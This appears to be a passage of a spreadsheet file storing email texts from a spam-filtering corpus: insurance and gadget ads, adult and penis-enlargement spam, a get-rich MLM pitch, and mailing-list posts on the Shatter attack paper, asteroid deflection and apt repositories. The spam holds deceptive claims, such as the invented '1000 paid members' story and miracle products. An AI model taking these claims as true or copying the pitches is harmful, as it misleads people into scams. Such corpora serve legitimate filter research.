         &lt;TR&gt;=20
           &lt;TD align=3D"center"&gt;
             &lt;B&gt;&lt;FONT color=3D#ffffff face=3D"Arial, Helvetica, =
 sans-serif" size=3D3&gt;
             Increasing Rates - All Guaranteed&lt;/FONT&gt;&lt;/B&gt;=20
           &lt;/TD&gt;
           &lt;TD align=3D"center"&gt;
             &lt;B&gt;&lt;FONT color=3D#ffffff face=3D"Arial, Helvetica, =
 sans-serif" size=3D3&gt;Flexible or Single Premiums&lt;/FONT&gt;&lt;/B&gt;=20
           &lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;=20
           &lt;TD align=3D"center"&gt;
             &lt;B&gt;&lt;FONT color=3D#ffffff face=3D"Arial, Helvetica, =
 sans-serif" size=3D3&gt;Nursing Home Waiver*&lt;/FONT&gt;&lt;/B&gt;=20
           &lt;/TD&gt;
           &lt;TD align=3D"center"&gt;
             &lt;B&gt;&lt;FONT color=3D#ffffff face=3D"Arial, Helvetica, =
 sans-serif" size=3D3&gt;Issue Age 0-85**&lt;/FONT&gt;&lt;/B&gt;=20
           &lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;=20
           &lt;TD align=3D"center" colSpan=3D2&gt;&lt;IMG alt=3D"Rising Interest =
 Rates Graph" height=3D150 =
 src=3D"http://63.211.81.87/images/huffman/20020410-2.gif" =
 width=3D550&gt;&lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;=20
           &lt;TD align=3D"center" colSpan=3D2&gt;&lt;IMG height=3D150 =
 src=3D"http://63.211.81.87/images/huffman/20020410-3.gif" width=3D550 =
 alt=3D"Rex Huffman &amp; Associates&amp;#10;800-749-9900 ext. 123&amp;#10;Call =
 today...$500 Bonus"&gt;&lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;=20
           &lt;TD colSpan=3D2&gt;&lt;/TD&gt;
         &lt;TR&gt;=20
           &lt;TD align=3D"center" colSpan=3D2&gt;=20
             &lt;TABLE bgColor=3D#000000 cellSpacing=3D0 width=3D"95%"&gt;
               &lt;TR&gt;=20
                 &lt;FORM =
 action=3Dhttp://65.217.159.103/response/response.asp method=3Dpost&gt;
                   &lt;TD&gt;=20
                     &lt;TABLE align=3Dcenter bgColor=3D#ffffff border=3D0 =
 cellPadding=3D2 cellSpacing=3D0 width=3D"100%"&gt;
                       &lt;TR&gt;=20
                         &lt;TD align=3D"center" bgColor=3D#2a4295 =
 colSpan=3D4&gt;&lt;B&gt;&lt;FONT color=3D#ffffff face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D2&gt;Please fill out the form below for more =
 information&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;
                       &lt;/TR&gt;
                       &lt;TR&gt;=20
                         &lt;TD align=3Dright width=3D"15%"&gt;&lt;FONT =
 face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;&lt;B&gt;Name:&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                         &lt;TD&gt;=20
                           &lt;INPUT name=3Dcontactname size=3D50&gt;
                         &lt;/TD&gt;
                         &lt;TD align=3D"center" colSpan=3D2 =
 rowSpan=3D2&gt;&lt;IMG alt=3D"Insurance IQ Logo" =
 src=3D"http://63.211.81.87/images/q.gif"&gt;&lt;/TD&gt;
                       &lt;/TR&gt;
                       &lt;TR&gt;=20
                         &lt;TD align=3Dright width=3D"15%"&gt;&lt;FONT =
 face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;E-mail:&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                         &lt;TD&gt;=20
                           &lt;INPUT name=3Demail size=3D50&gt;
                         &lt;/TD&gt;
                       &lt;/TR&gt;
                       &lt;TR&gt;=20
                         &lt;TD align=3Dright width=3D"15%"&gt;&lt;FONT =
 face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;&lt;B&gt;Phone:&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                         &lt;TD colSpan=3D3&gt;=20
                           &lt;INPUT name=3Dphone size=3D50&gt;
                         &lt;/TD&gt;
                       &lt;/TR&gt;
                       &lt;TR&gt;=20
                         &lt;TD align=3Dright width=3D"15%"&gt;&lt;FONT =
 face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;&lt;B&gt;City:&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                         &lt;TD width=3D"30%"&gt;=20
                           &lt;INPUT name=3Dcity&gt;
                         &lt;/TD&gt;
                         &lt;TD align=3Dright width=3D"15%"&gt;&lt;FONT =
 face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;&lt;B&gt;State:&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                         &lt;TD width=3D"40%"&gt;=20
                           &lt;INPUT name=3Dstate size=3D2&gt;
                         &lt;/TD&gt;
                       &lt;/TR&gt;
                       &lt;TR&gt;=20
                         &lt;TD align=3Dright width=3D"15%"&gt;&amp;nbsp;&lt;/TD&gt;
                         &lt;TD width=3D"30%"&gt;=20
                           &lt;INPUT name=3D"btnsubmit" type=3D"submit" =
 value=3D"Submit"&gt;
                         &lt;/TD&gt;
                         &lt;TD align=3Dright width=3D"15%"&gt;&amp;nbsp;&lt;/TD&gt;
                         &lt;TD width=3D"40%"&gt;=20
                           &lt;INPUT name=3D"hdnRecipientTxt" =
 type=3D"hidden" value=3D"kevin@rhanet.com"&gt;
                           &lt;INPUT name=3D"hdnSubjectTxt" type=3D"hidden" =
 value=3D"Huffman InsuranceIQ Ad Inquiry"&gt;
                         &lt;/TD&gt;
                       &lt;/TR&gt;
                     &lt;/TABLE&gt;
                     &amp;nbsp; &lt;/TD&gt;
                 &lt;/FORM&gt;
               &lt;/TR&gt;
             &lt;/TABLE&gt;
           &lt;/TD&gt;
         &lt;/TR&gt;
       &lt;/TABLE&gt;
     &lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt;=20
     &lt;TD align=3D"center" bgColor=3D#000000 width=3D"100%"&gt;
       &lt;FONT color=3D#ffffff face=3D"Arial, Helvetica, sans-serif" =
 size=3D1&gt;*Most States. **Surrender charge=20
       varies for ages 56+ in CT, IN, MD, OK, SC. Contracts issued by and =
 bonus=20
       sponsored by USG Annuity &amp;amp; Life Company/Equitable Life =
 Insurance Company=20
       of Iowa, 909 Locust Street, Des Moines, IA 50309. For agents only. =
 Rates=20
       subject to change. Product and features not available in all =
 states. IRAs/qualified=20
       plans are already tax deferred. Consider other annuity features. =
 We reserve=20
       the right to alter or end bonuses at any time. Minimum premium for =
 bonus=20
       $20,000. (AD020257).&lt;/FONT&gt;
     &lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt;=20
     &lt;TD align=3D"center" bgColor=3D#000000 width=3D"100%"&gt;=20
       &lt;P&gt;&lt;FONT color=3D#ffffff face=3D"Arial, Helvetica, sans-serif" =
 size=3D1&gt;We don't=20
         want anyone to receive our mailings who does not wish to. This =
 is professional=20
         communication sent to insurance professionals. To be removed =
 from this=20
         mailing list, &lt;B&gt;DO NOT REPLY&lt;/B&gt; to this message. Instead, go =
 here:=20
         &lt;A =
 href=3D"http://www.insurancemail.net"&gt;http://www.insurancemail.net&lt;/A&gt;&lt;br=
 &gt;
         &lt;a href=3D'http://www.insiq.com/legal.htm'&gt;Legal =
 Notice&lt;/a&gt;&lt;/FONT&gt;&lt;/P&gt;
     &lt;/TD&gt;
   &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------=_NextPart_000_237950_01C1F52E.BB0EE1E0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 60 minute free porn movie
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;p&gt;&lt;a href="http://www.jeweldive.com:81/sle/adult/index.html"&gt;&lt;img src="http://www.jeweldive.com:81/sle/adult/graphic.gif" border="0"&gt;&lt;/a&gt; 
 &lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.jeweldive.com:81/sles/penis/index.html"&gt;&lt;font size="+2"&gt;Click 
   Here&lt;/font&gt;&lt;/a&gt;&lt;font size="+2"&gt; to enlarge your penis 3-4 inches naturally&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.jeweldive.com:81/removal/"&gt;Click Here&lt;/a&gt; to be removed&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Shatter Attacks - How to break Windows
</t>
  </si>
  <si>
    <t xml:space="preserve">Be sure to read the followups on 
 http://online.securityfocus.com/archive/1/286228/2002-08-03/2002-08-09/1
 where basically the consensus is that the article author is that this is
 (1) an application problem, not a Windows problem and (2) a problem only
 a certain class of poorly written applications. So, yeah, it's a new
 attack, but it's not nearly as devastating an MS critique as the author
 wants us to believe it is.
 Luis
 On Fri, 2002-08-09 at 13:08, Gary Lawrence Murphy wrote:
 &gt; 
 &gt; I'm sure this is common knowledge already, but just in case ...
 &gt; 
 &gt; http://security.tombom.co.uk/shatter.html
 &gt; 
 &gt;    This paper presents a new generation of attacks against Microsoft
 &gt;    Windows, and possibly other message-based windowing systems. The
 &gt;    flaws presented in this paper are, at the time of writing,
 &gt;    unfixable. The only reliable solution to these attacks requires
 &gt;    functionality that is not present in Windows, as well as efforts on
 &gt;    the part of every single Windows software vendor. Microsoft has
 &gt;    known about these flaws for some time; when I alerted them to this
 &gt;    attack, their response was that they do not class it as a flaw -
 &gt;    the email can be found here. This research was sparked by comments
 &gt;    made by Microsoft VP Jim Allchin who stated, under oath, that there
 &gt;    were flaws in Windows so great that they would threaten national
 &gt;    security if the Windows source code were to be disclosed. He
 &gt;    mentioned Message Queueing, and immediately regretted it. However,
 &gt;    given the quantity of research currently taking place around the
 &gt;    world after Mr Allchin's comments, it is about time the white hat
 &gt;    community saw what is actually possible.
 &gt; 
 &gt; 
 &gt; -- 
 &gt; Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 &gt; Business Innovations Through Open Source Systems: http://www.teledyn.com
 &gt; "Computers are useless.  They can only give you answers."(Pablo Picasso)
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: Cincinnati Group Wants To Stamp Out Hotel Sex Movies
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
 &gt;&gt;  (CNSNews.com) - A pro-family group in Cincinnati that has pressured
 &gt;&gt;  two area hotels to stop showing adult pay-per-view movies has vowed
 &gt;to
 &gt;&gt;  expand its grass- roots campaign nationwide.
 &gt;
 &gt;
 &gt;Quite right. And while they're at it, they can get that bunch of
 &gt;religious nuts to stop sneaking their book of hate and intolerence
 &gt;into the bedside cabinets, you know, that one with all the telephone
 &gt;humbers in it.
 &gt;
 &gt;Oh, and the Gideon Society can take their bibles back as well.
 &gt;
 &gt;RobinH
 &gt;
 What are you talking about??? That book is where all the best free porn is!!
 Piece of trivia: the thing is so pithy it floats!!
 -- 
 Fel
 http://www.frogstone.net
 Weird Page: http://my.athenet.net/~felinda/WeirdPage.html
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Barney Not Found
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/08.html#barney_not_found
 Date: 2002-10-08T22:41:03-05:00
 Microsoft Knowledge Base Article Q172668: Barney Fun on Imagination Island 
 Error Message: Barney Not Found[1]. Microsoft ActiMates Interactive Barney may 
 conflict with a wide range of radio-operated electronic devices, including 
 burglar alarms, resulting in the dreaded &amp;#8220;Barney Not Found&amp;#8221; error. 
 To resolve this problem, Microsoft recommends turning off your burglar alarm. 
 Incidentally, this is the funniest MS KBase article I've seen since Earth 
 Rotates in Wrong Direction[2].
 [1] http://support.microsoft.com/default.aspx?scid=KB;EN-US;Q172668&amp;
 [2] http://support.microsoft.com/default.aspx?scid=KB;EN-US;Q131109&amp;
</t>
  </si>
  <si>
    <t xml:space="preserve">Eugen Leitl writes:
 &gt; Apart from twiddling with the surface albedo which might be not
 &gt; enough -- we currently don't have ion drives with enough power, or at
 &gt; least we can't develop and deploy them on time, 
 My estimate is that, in the worst case, we have 17 years (5.4e8
 seconds) to move it one earth radius, or about 6000 km (6e6 m).  
 a t^2/2 = x, if I remember right, so a = 2x/t^2, which is 
 1.2e7 m/(2.9e17 s^2), or about 4.1e-11 m/s^2, which is not a very
 large acceleration, roughly equivalent to the gravitational
 acceleration in these parts divided by 200000000000.  Assuming a
 2km-wide --- that is, 20 000 decimeter-wide --- spherical asteroid of
 specific gravity 10, 4/3 pi r^3 says it would have a volume of 4e12
 cubic decimeters and thus a mass of 4e13 kg.  The force we'd have to
 apply to achieve this acceleration would be roughly equivalent to the
 weight of 200 kg here on Earth.
 So, yeah, ion drives are probably a no-go, unless I screwed up the
 calculations here; I think the force they typically exert is about
 four orders of magnitude too small.
 If we just wanted to hit today it with enough of an impulse that it
 would miss us 17 years later, we'd need to accelerate it by about 1.1
 cm/s.  A one-ton (1000kg) mass would need to hit it at about 4e9 m/s,
 or about ten times the speed of light, to achieve this, so that's not
 possible.  (If you could actually put enough work into a one-ton mass,
 as it approached the speed of light, it would mass more, so you could
 still do it with a one-ton mass; but we don't have anything
 approaching that speed.)  The impulse required is inversely
 proportional to the remaining time to impact, so if we were to hit it
 after half the time has elapsed, we'd need to accelerate it by around
 2.2 cm/s instead.
 The gravitational force of an Earth-sized mass could provide
 sufficient deflection if that mass were about 4.5e5 times as far away
 from the asteroid as we are from Earth's center, or about 2.7e9 m, or
 about 0.018 times the distance from the Earth to the Sun (0.018 AU).
 (And if that mass stayed so nearby for 17 years.)
 The effects of continuous acceleration benefit greatly from planning
 ahead, since they scale with t^2, not t --- and thus the needed
 acceleration scales with 1/t^2.  After half the time has elapsed, we'd
 need four times as much acceleration to make it miss the Earth than if
 we were to start accelerating it now.
 All of these numbers are a little low, because the Earth presents a
 slightly easier target than its physical size suggests, due to its
 gravity well.  How much easier depends on the speed of the projectile
 in ways I don't understand.
 They're also a little high, because they assume the force is being
 applied purely at right angles to the asteroid's current path, which
 is a slightly suboptimal scenario (although for velocity changes five
 orders of magnitude smaller than the relative velocity, the difference
 is probably insignificant.)  And they assume there are no other effects on the asteroid's path.
 What about electrical charges?  Could we electrically charge the
 asteroid and another nearby asteroid, perhaps with electron beams, to
 provide the needed acceleration?
 Of course, all of this calculation could be applied in the other
 direction, too.  If you want to sock a moon colony with a one-ton
 asteroid, you could do it with a tiny amount of force applied over
 twenty-five years to adjust its orbit.
 ***
 About spam: I'm sorry to admit I haven't implemented any of the better
 solutions, and so I'm afraid I'll have to allow non-subscriber FoRK
 mail to be detained for scanning.  I hope this measure can be reversed
 soon when I have time to implement better measures.  As has often been
 noted by other posters, measures to reduce spam sent to the FoRK list
 will not significantly decrease the spam load of FoRKposters, since
 the vast majority of spam received by FoRKposters is sent to them
 directly, not through the FoRK list.
 -- 
 &lt;kragen@pobox.com&gt;       Kragen Sitaker     &lt;http://www.pobox.com/~kragen/&gt;
 Silence may not be golden, but at least it's quiet.  Don't speak unless you
 can improve the silence.  I have often regretted my speech, never my silence.
 -- ancient philosopher Syrus (?) via Adam Rifkin, &lt;adam@cs.caltech.edu&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [vox] GPL limits put to a test
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 23 Aug 2002, Tom wrote:
 --]
 --]XviD [1] is a project to make GPL divx codecs. Sigma Designs [1] is a
 Sorry, Sigma Designs should be the [2] not the [1]
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
        Socijalisticka partija Srbije, predvodjena grupom starih socijalista na celu sa Milomirem Minicem, konacno se odrekla politike i herojskog drzanja predsednika te stranke Slobodana Milosevica, saopstenjima, da jedan ,,slabo obavesten covek ne moze, pogotovu ne iz zatvorske celije upravljati tako velikom partijom kao sto je Socijalisticka partija Srbije, pa zvao se on i Slobodan Milosevic''.
        Socijalisti koji za sebe danas kazu da vise nisu idolopoklonici Slobodana Milosevica, neprestano, u kontaktima sa clanovima i simpatizerima te partije, pokusavaju da razdvoje odbranu Slobodana Milosevica u Hagu, od politickog zivota u Srbiji, pripisujuci Milosevicevim braniocima iz nacionalnog komiteta za oslobadjanje S. Milosevica, ,,Sloboda'' da im je cilj da uniste Socijalisticku partiju Srbije.
         Iako je zbog istih takvih gledista, svojevremeno najpolularniji socijalista, posle predsednika te stranke, prof. Branislav Ivkovic bio iskljucen iz redova SPS, danas rukovodstvo SPS koristi jos teze i grublje kvalifikacije na racun njihovog predsednika, pritom ne strahujuci da bi bilo ko od njih mogao biti iskljucen iz partije.
         Ne retko se poslednjih dana, u rokovodstvu partije cuje da partija nije Slobodan Milosevic, i da on ne predstvalja tu partiju, vec da su partija Rukovodstvo i Glavni odbor te stranke.
         Medjutim u clanstvu i medju simpatizerima te stranke, stvari se ne odijaju bas po planovima rukovodstva.
         Procene idu dotle da se na septembarskim izborima ocekuje da Bata Zivojinovic osvoji tek 1% glasova.  Clanovi partije, najveci deo njih i danas veruje svom heroju, Slobodanu Milosevicu.
         Po clanstvu partije, ovih dana u rukovodstvu partije, oni koji su predsednika te stranke pogresno informisali poslednjih godina, kada su shvatili da im je ,,odzvonilo'' pokusavaju da sacuvaju sebe eliminacijom predsednika Slobodana Milosevica.
         Mladi socijalisti, kojih i nema bas mnogo, kako se SPS svojevremeno hvalio, izgleda su na strani predsednika te stranke. Tako se u nastupima na opstinskim odborima, mogu cuti uverljivi govori Dejana Stjepanovica i Igora Raicevica, i po neki Milinka Isakovica iz redova mladih socijalista, clanova organizaciono politickog odbora predsednika SPS. 
         Obracanja ovih mladih ljudi, medju clanstvom partije imaju do deset puta vecu tezuni, nego li obracanja profesionalnih politicara koji za sobom vuku teret proslosti.
          Stav rukovodstva mladih socijalista, se razlikuje od stava saveta mladih, koji su takodje na strani predsednika. 
          Branko Ruzic i Dejan Backovic, svojevremeno najveci branioci i zastupnici lika i dela Slobodana Milosevica, danas su se pretvorili u njegove najvece kriticare. Pokusavaju na sve moguce nacine da minorizuju grupu mladih koja ga podrzava.
          Cak se poslednjih dana cuje, da je najbolji recept da se rukovodstvo mladih odrzi ikao je protiv Sloba, da se povezu rodbinskim vezama, pa se tako predsednik mladih socijalista Beograda, Ana Djurovic udala za Branka Ruzica, predsednika Mladih socijalista Srbije, koji je za kuma uzeo Dejna Backovia, svog potpredsednika. Backovic se ovih dana zeni, jednom  mladom socijalistkinjom koja je clan saveta mladih, a u isto vreme i sestra jednog od clanova IO GO SPS-a, za kuma uzima jos jednog mladog socijalistu iz Saveta mladih. Sve u svemu, mladi u SPS se drze kao italijanske mafijaske porodice 60-tih u SAD.
           Sta ce se do kraja price dogoditi ostaje pitanje, no clanstvo i simpatizeri ce oceniti rad svog rukovodstva na predsednickim izborima.
           Pimato se samo, sta ce da rade, ako im Bata prodje losije od Seselja koga je predsednik Slobodan Milosevic podrzao za predsednickog kandidat?
 _______________________________________________________________________
 Powered by List Builder
 To unsubscribe follow the link:
 http://lb.bcentral.com/ex/sp?c=15279&amp;s=90B245569C3B981A&amp;m=4
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2 Sep 2002, Justin Mason wrote:
 =&gt;http://spamassassin.org/released/ :
 =&gt;
 =&gt;  508284 Sep  2 18:27 Mail-SpamAssassin-2.40.tar.gz
 =&gt;  561425 Sep  2 18:27 Mail-SpamAssassin-2.40.zip
 =&gt;
 Not that I'm not grateful, but..... :-)
 I'd really like to install from a src rpm. Any takers? :-)
 TIA
 -- 
 -Time flies like the wind. Fruit flies like a banana. Stranger things have -
 -happened but none stranger than this. Does your driver's license say Organ
 -Donor?Black holes are where God divided by zero. Listen to me! We are all-
 -individuals! What if this weren't a hypothetical question? steveo@syslang.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free to Join!
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings -
 I understand you are interested in making some money, and thought
 you might be interested in this.
  A few months back I joined a program and then...promptly forgot
 about it. You may have done this yourself sometime...you intend
 to work the program but then get caught in your day-to-day
 activities and it's soon forgotten.
 The program was free to join so maybe I just didn't take it very seriously.
 Anyway, near the end of May I received a letter from my 
 sponsor (Vic Patalano) informing me that I had more than 1000 
 PAID members in my group!
  As you can imagine, I was very skeptical. After all, how could I 
 have more than 1000 paid members under me in a program that I had
 never promoted?
 I took the time to check out the site...then wrote to Vic asking 
 for confirmation that these were paid members and not just free 
 sign-ups...like me :)
 Well, it was true...I had over 1000 paid members in my group. This 
 is a program that I had never worked!
  All I had to do was upgrade to a paid membership before the end 
 of the month and I would have my position locked in and a group of over 1000
  people.
  You can bet I wasted no time in getting my membership upgraded!
 I can tell you, if I had known what was happening with this program,
  I would have become an active paid member months ago!
  With this program, you will get a HUGE group of PAID MEMBERS.
 My sponsor's check, which is a minimum of $5,000, arrives every
 month...on time.
 How would you like to lock your position in FREE while you check
 out this opportunity and watch your group grow?
 To grab a FREE ID#, simply reply to:  sejr102@yahoo.com
 and write this phrase:
 "Email me details about the club's business and consumer opportunities"
 Be sure to include your:
 1. First name
 2. Last name
 3. Email address (if different from above)
 Once I receive your reply, I will submit your information and you 
 will receive an e-mail titled "your name, Activate Your FREE Membership Today!" You will then need to confirm your FREE Membership.
 We will then send you a special report, along with your Free Membership ID Number and also let you know how you can keep track of your growing group, then you can make up your own mind.
 That's all there is to it.
 Warm regards,
 Sean
  P.S. After having several negative experiences with network
 marketing companies I had pretty much given up on them.
 This company is different--it offers value, integrity, and a
 REAL opportunity to have your own home-based business...
 and finally make real money on the internet.
 Don't pass this up..you can sign up and test-drive the
 program for FREE.  All you need to do is get your free
 membership.
 ============================================================================
 =========
 "This email is sent in compliance with strict anti-abuse and NO SPAM
 regulations. The message was sent to you as a response to your ad, an opt-in
 opportunity, your address was collected as a result of you posting to one of
 my links, reviewing your web site, you answering one of my classified ads,
 you have sent me an E-mail, or you unknowingly had your e-mail added to an
 opt-in mailing list. You may remove your E-mail address at no cost to you
 whatsoever, simply send an e-mail to sejr102@yahoo.com with subject, remove me ============================================================================
 =========
 0805wSRp6-561vfdn8353FvPk0-290xryS2l33
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Feb 04, 2002 at 02:33:29PM +0200, Peter Peltonen wrote:
 &gt; On Fri, Feb 01, 2002 at 05:41:32PM +0200, Harri Haataja wrote:
 &gt; &gt; I have a local one for the main and upgrades from somewhere plus my own
 &gt; &gt; at $ORKPLACE.
 &gt; 
 &gt; Olen ajatellut pystytt itselleni lokaalin apt-varaston, kun Suomesta ei 
 &gt; tunnu lytyvn julkista peili. Osaisitko avittaa hiukan asiassa, eli 
 &gt; kuinka lhte liikkeelle? Ensin kannattanee peilata varsinainen RH:n rpm:t 
 &gt; jostain, vaan mill softalla (rsync?) ja mist (funet?) tuo kannattaa 
 &gt; tehd, ajatuksia?
 I'll post my own repository story here anyway, hope no-one minds.
 It may freely be commented on or used in another text.
 I have a directory like this:
 $ tree  -d
 .
 |-- current7
 |   |-- SRPMS.current
 |   |-- SRPMS.gcc3
 |   `-- redhat
 |       |-- RPMS.current
 |       |-- RPMS.gcc3
 |       `-- base
 |-- redhat-7_2
 |   |-- SRPMS.os
 |   `-- redhat
 |       |-- RPMS.os -&gt; &lt;link to RH network install image&gt;
 |       `-- base
 `-- testing
     |-- SRPMS.testing
     `-- redhat
         |-- RPMS.testing
         `-- base
 27 directories
 I throw updates to current7's rpms and my own stuff (with makefile :) to
 testing.
 After each new package, 
 nice genbasedir -s --progress --topdir=$TOPDIR/ \
 testing/redhat testing
 (for -s to work, you need to make release files, pinch someones for
 exmple)
 This stuff is found under apache. I put that url, my keys and all that
 into apt conf on the machines on the network and apt away.
 As for .fi mirrors, funet is very slow. I think I use tuxfamily for
 updates but when I see errata I usually also put that to my own one so
 rest of the machines have a shorter path to it.
 Funet hosts a whole load of mirrors and projects (it used to be (is?)
 the main mirror for Linux. It was one of the big pub ftp sites). If
 there was a definite apt repository, maybe they might mirror that as
 well. I doubt RH would be very keen on using apt and forking a
 distribution doesn't seem like an easy option, someone should just start
 a project.
 -- 
 "Barry also was quick to point out that the Titanium uses torque screws as
 opposed to Phillips screws. We're not sure why this matters even a little
 bit, but Barry sure seemed to think it was interesting.
 That's why Mac geeks scare us." 	-- ZDNet Powerbook Titanium review 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Note: 
 This is NOT SPAM!! This is NOT Unsolicited Email!! You are receiving this message because you OPTED-IN to receive certain special offers from one of our partnering sites.
 Have you changed your mind?
 Do you want to STOP receiving these special offers? If so, go down to the bottom and click on the "unsubscribe" link to be removed from this OPT-IN only list.
 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 Dear Subscriber, Please take a moment to remove yourself from this list if you feel you are receiving these messages in error, by going down to the bottom and clicking on the unsubscribe link below.
 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 Special Offer $2.99 until 08/26/2202 5:00 pm
 1. Sexual Fitness and Penis Enlargement System
 ............................................................
 Video of the week:(Choking a Chinese Chicken?)
 Caught on tape!
 Some Asian Guy in a Chinese Dressing Room. What the hell is this guy doing in there? Is he actually chocking his chicken on tape? You'll see about him and more when you check out this special offer!
 Offer #08-515352-2002(4)
 Page (1 of 1)
 Special Offer $2.99 until 08/26/2202 5:00 pm
 ............................................................
 Subject : Male Enlargement/Strengthening and Total Sexual Fitness!
 For only............($2.99)!
 Just wanted to remind you about the special we have this month. Our total program has the following information:
         How to Increase Permanent Length!  
         How to Increase Permanent Width!
         How to stop pre-mature ejaculation!  
         How to stop Erectile Dysfunction!
         How to Increase Penis Strength!  
         How to make your Penis Thick and Meaty!
         How to Enlarge the Penis head (glans)!  
         How to Increase Staying Power!
         How to Increase Ejaculation Distance and Volume!  
         Plus much more!!!! 
 Plus our new Quick Start Program:
 *Quick Start - Extreme Sexual Fitness Program!
 Now you can Jump Start your Penis Enlargement and Sexual Fitness by using our Quick Start Program! The Quick Start Program is a no frills bare-bones Sexual Fitness and Penis Enlargement Cram Course set up to have you Gaining size and Performing Better in a really short amount of time. Once you finish the Quick Start Program you can Explore the whole Penis Enlargement Course. Using the Quick Start Program is totally your option. 
 *Video Library - Search our video library of Instructional and Original Amateur Entertainment Videos inside!
 *The Most information about Penis Enlargement and Sexual Fitness!
 With over (40) Different Techniques each explained step-by-step, this system is the best value for your money pound for pound!
 *The Lowest price on the Net! .....($2.99) for everything!!
 This offer is for a limited time only! Order Today!
 Special Offer $2.99 until 08/26/2202 5:00 pm
 For other Info:
 FAQ's
 Testimonials
 Ordering Info
 Business Opps
 Video of the week info
 Advertising Info
 Plus all other!
 Go to: www.bigthangz.com
 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 2. Boost your Sales!
 ............................................................
 Your Ad Will be here if you want it seen by Millions every month! Plus be in Widely circulated Magazines and Newspapers Nationwide! Plus join our Permission based email Advertising ring! Blow your sales through the roof!
 Ask us how at: sales@bigthangz.com
 Numbers 3-10...............Coming Soon!
 Have you changed your mind?
 Do you want to STOP receiving these special offers? If so, go down to the bottom and click on the "unsubscribe" link to be removed from this OPT-IN only list.
 ---
 To remove yourself from further mailings, click the link below:
 http://GetResponse.com/r.cgi?a=specialweboffers&amp;e=zzzz_Xyspamassassin.taint.org&amp;i=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cell Phone Antenna Booster &amp; Hands Free Headset
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_519_80667744048
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 THE WORLDS MOST ADVANCED CELL PHONE SIGNAL BOOSTER &amp; HANDS FREE CELL PHONE =
 HEADSET
 Super Signal 2002 is the worlds most technologically advanced internal =
 antenna booster, and adapts to all makes and models of cell and mobile phones.
 Normally $19.99 each
 Now from $2.99 to $7.99 each!
 ( price based upon number of units purchased )
 BONUS:  FREE Radiation Shield with each antenna purchased!
 Super Signal 2002 utilizes the same advanced aerospace technology used by =
 state-of-the-art satellite dish receivers, which results in less dropped calls,=
  less dead zones, and improved reception in buildings, elevators, hallways, =
 tunnels, mountains, and any place where a signal is weak.  Dont miss that =
 urgent call from your loved ones during an emergency, natural disaster, or any =
 critical situation.  Get yours now!
 Also, check out our lightweight hands-free cellular headsets.
 Click below on to our website for more information at:
 www.thezs.com/0003
 If you are having problems clicking the link above, then copy and paste our =
 web address into your web browser.
 If you wish to no longer be included on our mailing list, please click here: =
 mailto:remove@nouce1.com or write us at: NOUCE1, 6822 22nd Ave. N., 
 St. Petersburg, FL  33710-3918
